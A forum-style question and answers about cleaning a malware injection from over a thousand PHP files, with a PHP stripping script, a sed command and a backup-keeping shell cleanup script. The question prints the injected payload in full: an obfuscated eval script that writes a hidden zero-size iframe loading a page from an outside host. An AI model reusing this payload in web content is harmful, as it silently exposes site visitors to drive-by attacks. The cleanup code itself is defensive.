I have a problem removing virus code from my PHP files. There are more than 1200 PHP files on my server and every single PHP file has been infected by a virus. The virus code adds this line to the HTML output.
Here is the virus code:
<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>
The above code is in every single PHP file. How can I remove this virus code from every PHP file? Is there a quick way of doing it?
You can use:
removeVirus.php
    <?php
    // Strip the injected <tagN>...</tagN> span from every PHP file under the current directory.
    foreach (rglob("*.php") as $virusFile) {
        $withVirus = file_get_contents($virusFile);
        $withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
        file_put_contents($virusFile, $withoutVirus);
    }

    // Recursive glob: returns files matching $pattern in this directory and all subdirectories.
    function rglob($pattern, $flags = 0){
        // forked from https://github.com/rodurma/PHP-Functions/
        // blob/master/glob_recursive.php
        $files = glob($pattern, $flags);
        foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir) {
            // Recurse with rglob() itself; glob_recursive() is not defined in this file.
            $files = array_merge($files, rglob($dir.'/'.basename($pattern), $flags));
        }
        return $files;
    }
Usage:
Put removeVirus.php on the root of your website and execute from the shell as root (or as the owner of the files):

    php removeVirus.php
Notes:
1 - I've tested the code on my server with 10 PHP files containing the virus and it worked as intended.
2 - Make sure you find the source of the hack and patch your system accordingly.
If the "virus code" string literal you have provided is embedded in every PHP file, then it can be removed via the command line. Open the shell application (Command Prompt for Windows or Terminal for UNIX/UNIX-based operating systems, e.g. OS X, Linux, etc.). You will need to escape the virus code before you pass it to the shell; however, the ideal methods may vary depending on your system. Execute the following commands:
    cd /path/to/your/infected/php/files
    sed -i 's/insert_escaped_virus_code_here//g' *
P.S. If sed has not yet been installed, then follow these directions for OS X and Windows.
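
An added example, not part of either answer above: a shell script that first does a dry run listing the .php files that contain the injected markup, and only rewrites them when given a backup directory for the originals. The pattern is an assumption built from the sample in the question, and the script name clean.sh and the paths in its usage comment are placeholders.

```shell
#!/bin/sh
# Added example. PATTERN is an assumption derived from the sample in the
# question: empty <tagN></tagN> pairs around a single-line <script> payload.
PATTERN='<tag[0-9][0-9]*></tag[0-9][0-9]*><script>.*</script><tag[0-9][0-9]*></tag[0-9][0-9]*>'

# list_infected DIR: print each .php file under DIR containing the marker.
list_infected() {
    # grep exits 1 when nothing matches; that is not an error here.
    find "$1" -type f -name '*.php' -exec grep -l -e "$PATTERN" {} + || :
}

# clean_tree DIR [BACKUP_DIR]
#   Without BACKUP_DIR: dry run, only reports what would change.
#   With BACKUP_DIR (keep it outside the web root): copy each original there,
#   then rewrite the file with the injected span removed.
clean_tree() {
    dir=${1%/}
    bak=${2:-}
    list=$(mktemp) || return 1
    list_infected "$dir" > "$list"
    count=0
    while IFS= read -r f; do
        count=$((count + 1))
        if [ -z "$bak" ]; then
            echo "would clean: $f"
            continue
        fi
        rel=${f#"$dir"/}
        mkdir -p "$bak/$(dirname "$rel")" &&
            cp -p "$f" "$bak/$rel" &&
            sed "s|$PATTERN||g" "$bak/$rel" > "$f" &&
            echo "cleaned: $f (original in $bak/$rel)" ||
            { echo "failed: $f" >&2; rm -f "$list"; return 1; }
    done < "$list"
    rm -f "$list"
    echo "$count file(s) matched"
}

# Usage (placeholder paths): sh clean.sh /path/to/site            dry run
#                            sh clean.sh /path/to/site /root/bak  apply
if [ "$#" -gt 0 ]; then clean_tree "$@"; fi
```

A dry run that reports 0 files means the markup is not stored literally in the .php sources, so this script would change nothing and the injection has to be looked for elsewhere.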